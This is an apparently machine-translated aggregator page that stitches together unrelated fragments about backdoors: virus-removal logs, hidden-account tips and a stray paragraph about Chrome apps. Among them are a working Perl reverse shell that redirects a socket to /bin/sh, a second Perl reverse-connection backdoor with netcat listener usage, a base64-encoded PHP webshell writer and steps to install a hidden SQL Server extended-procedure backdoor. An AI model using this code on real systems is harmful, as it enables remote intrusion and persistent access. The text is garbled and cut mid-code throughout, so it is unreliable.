(USA)File version:Note:Copyright: (c) Microsoft Corporation. All rights reserved.Note:Product Version:Product Name: Microsoft (r) Windows (r) Operating SystemCompany Name: Microsoft CorporationLegal trademark:Internal Name:Source File Name:Creation Time:Modification time:Access time:Size: 17436 bytes, 17.28 KBMD5: 86ac4df3630f76bbfb5265746d52ea3
Scanned file: xx.exe-infected
Xx.exe-infected by backdoor. win32.agent. ahjStatistics:
Known vi
Beep. sys/Trojan. ntrootkit.1192, msplugplay 1005.sys/ backdoor. pigeon.13201, etc. 1
Original endurer2008-06-24 1st
A netizen reported that his computer often pops up Advertisement Windows recently. Sometimes the response is slow and the program restarts. Please help me with the repair.
Download pe_xscan to scan logs and analyze the logs. The following suspicious items are found:
Pe_xscan 08-04-26 by Purple endurer 2008-5-22 12:36:54 Windows XP Servi
EndurerOriginal
2006-12-121Version
According to an email sent by a bit, his computer has been reported to have detected backdoor. gpigeon. uql each time the system started rising since January 1, December 1, with logs scanned by hijackthis.
The following suspicious items are found in the log:/---------C:/Windows/camerafixer.exe
O4-startup Item HKLM // run: [camerafixer] C:/Windows/camerafixer.exe
O21-ssodl: policime-{724c75f1-b757-408d-a50a-4cf99da35d
Use preg_replace dangerous e modifiers with caution (a single-sentence backdoor is commonly used ). Preg_replace function prototype: mixedpreg_replace (mixedpattern, mixedreplacement, mixedsubject [, intlimit]) Special note: e modifier enables preg_replace () to replacement parameter when
Preg_replace function prototype:
Mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])
Note:
The/e modifier enables preg_replace ()
Today, a customer's server is frequently written with a backdoor and deleted. the following code was added to the program. you can pay attention to the parameters of the base64_decode function. ThinkPHP
Today, a customer's server is frequently written:
Mm. php
Content:
The code is as follows:
Finally, find the first action in a file:
The code is as follows:
Fputs (fopen (base64_decode ("bW0ucGhw"), "w"), base64_decode ("PD9ldmFsKCRfUE9TVFtjXS
security of the computer. 4. prohibit the establishment of an empty connectionBy default, any user can connect to the server via an empty connection, enumerate the accounts, and guess the password. Therefore, we must prohibit the establishment of an empty connection. There are two ways to do this:method One is to modify the registry: Open the Registry "Hkey_local_machinesystemcurrentcontrolsetcontrollsa"and the DWORD value " RestrictAnonymous " key value changed to " 1 " can be. Final Security
1 #!/usr/bin/env Perl2 Usewarnings;3 UseStrict;4 Use Socket;5 6 my $HOST='localhost';7 my $PORT=8080;8 Socket(S,pf_inet,sock_stream,Getprotobyname("TCP"));9 if(Connect(S,sockaddr_in ($PORT, Inet_aton ($HOST)))){Ten Open(STDIN,">s"); One Open(STDOUT,">s"); A Open(STDERR,">s"); - exec("/bin/sh-i"); -}The above open is for redirection, to redirect all sockets to all of the Shell'sThe last exec was to jump into the/bin/sh.Because the front has been connected with the stdin STDOUT
, then put in Lanker micro PHP backdoor client Trojan address added to hxxp://localhost/test/test.php?test=. The/t.txt password is added to CMD, which can be seen by executing the returned results.
For HTML files, it is generally a template file. In order to make a trojan that is inserted into the HTML file can be invoked to execute and not be displayed, we can add a text box with a hidden attribute in the HTML, such as: then use the same method as ab
Reverse connection
Code :
1 .#! /Usr/bin/perl
2. # usage:
3. # nc-VV-l-P port (default 1988) on your local system first, then
4. # Perl $0 remote IP (default 127.0.0.1) remote_port (default 1988)
5. # type 'exit 'to exit or press enter to gain shell when u under the 'console '.
6. # nc-VV-l-P 1988
7. # Perl backdoor. pl 127.0.0.1 1988
8.
9. # use strict;
10. Use SOCKET;
11. Use IO: socket;
12. Use CWD;
13. Use IO: handle;
14. My $ remote = $ argv [0]
EndurerComments
1Version
For example:
I am in the middleBackdoor. gpigeon. IIRRising Star 2007 can be used to make the difference. After the attack is completed, restart the system.Virus files: C:/program files/Internet Explorer/iyune.exe-> backdoor. gpigeon. IIR
The following suspicious items are found in the log of hijackthis attached to the email:/--------Hijackthis_zww Chinese Version scan log v1.99.1Saved on 16:57:48, dateOperating System
EndurerOriginal
1Version
A netizen's computer, rising boot scanning reports these days found backdoor. gpigeon. uql. For example:------------Virus name processing result found date path file virus sourceBackdoor. gpigeon. uqlCleared successfully iexplore. EXE> C:/program files/Internet Explorer/iexplore. EXE Local MachineBackdoor. gpigeon. uqlCleared successfully iexplore. EXE> C:/program files/Internet Explorer/iexplore. EXE Local Machine----------
The administrator can also hide accounts, query 3389 logon logs, rootkit, and SQL logs.
Really tmd bt. A new backdoor is found to be very hidden ---------------
Three steps:
1. Copy xplake2.dll
Microsoft SQL Server \ MSSQL \ binn directory
2. Run the following command:
Use master
Exec sp_addextendedproc 'xp _ lake2 ', 'xplake2. dll'
3. Run the following command:Grant ExecOn xp_lake2To public-----------------------------------------OK:Test me
Virus name: Backdoor. Win32.IRCBot. acd (Kaspersky)
Virus size: 118,272 bytes
Shelling method: PE_Patch NTKrnl
Sample MD5: 71b015411d27794c3e900707ef21e6e7
Sample SHA1: 934b80b2bfbb744933ad9de35bc2b588c852d08e
Time detected: 2007.7
Time updated: 2007.7
Transmission Mode: Spread through MSN
Technical Analysis
The virus sends a message to the MSN contact and is a photo-infected compressed package. When the contact of the other party receives and opens
system. This idea of "writing once and running anywhere" is not novel, but with the development of the network, we seem to have seen the hope of achieving it.
Recently, Google is trying to put the Chrome app initiator in another operating system. If Chrome Developer Edition is used, Windows users can use Chrome app starters, while Mac starters are also under development. This makes it easier for Windows and Mac users to use Chrome applications and experience Chrome OS.
In addition, Google also
hacker makes a modified registry-based hidden account, the administrator's permissions to the registry are removed. Then the administrator is unable to remove the hidden account through the registry, or even know the hidden account name created by the hacker. But there is no absolute, we can use the help of "Group Policy", so that hackers cannot login by hidden accounts. Click "Start" → "Run", enter "Gpedit.msc" Run "Group Policy", expand "Computer Configuration" → "Windows settings" → "Securit
Author: an article written by baoz a long time ago, I transferred it back. It's strange. at that time, I was able to hide the port, but now I can't hide the port, and the answer will soon come out :) find out the reason, and the thing is still original, if you encounter similar problems, use the original version. if you want to know where the problem is, use diff on your own.
Author: baozI wrote an article long ago and transferred it back. It's strange. at that time, I tested to hide the port, b
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.